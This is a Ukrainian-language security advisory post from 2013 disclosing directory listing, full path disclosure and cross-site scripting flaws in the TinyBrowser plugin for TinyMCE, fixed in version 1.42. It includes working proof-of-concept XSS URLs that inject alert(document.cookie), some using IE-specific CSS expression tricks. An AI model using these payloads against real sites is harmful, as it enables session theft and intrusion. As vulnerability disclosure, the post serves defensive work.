Численні уразливості в TinyBrowser
23:54 08.01.2013У грудні, 28.12.2012, я знайшов численні уразливості в TinyBrowser для TinyMCE. Це Information Leakage, Full path disclosure та Cross-Site Scripting уразливості. Про що вже повідомив розробникам.
Раніше я вже писав про Виконання коду в TinyBrowser.
Information Leakage (Directory Listing) (WASC-13):
http://site/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=
http://site/tiny_mce/plugins/tinybrowser/edit.php?type=
Виводиться зміст коренової директорії сайта, якщо немає директорії для завантаження.
Full path disclosure (WASC-13):
В tinybrowser.php і edit.php виводиться FPD якщо немає папки для завантаження.
Якщо завантажити скрипт з розширенням зображення, то також випадають FPD.
XSS (WASC-08):
http://site/tiny_mce/plugins/tinybrowser/upload.php?type=%22);alert(document.cookie)//
Для IE:
http://site/tiny_mce/plugins/tinybrowser/upload.php?type=%22%20style=%22xss:\0065xpression(alert(document.cookie))
http://site/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=%22%20style=%22xss:\0065xpression(alert(document.cookie))
http://site/tiny_mce/plugins/tinybrowser/edit.php?type=%22%20style=%22xss:\0065xpression(alert(document.cookie))
Уразливі старі версії TinyBrowser (такі як 1.33 та попередні версії). В версії TinyBrowser 1.42 дані уразливості вже виправлені.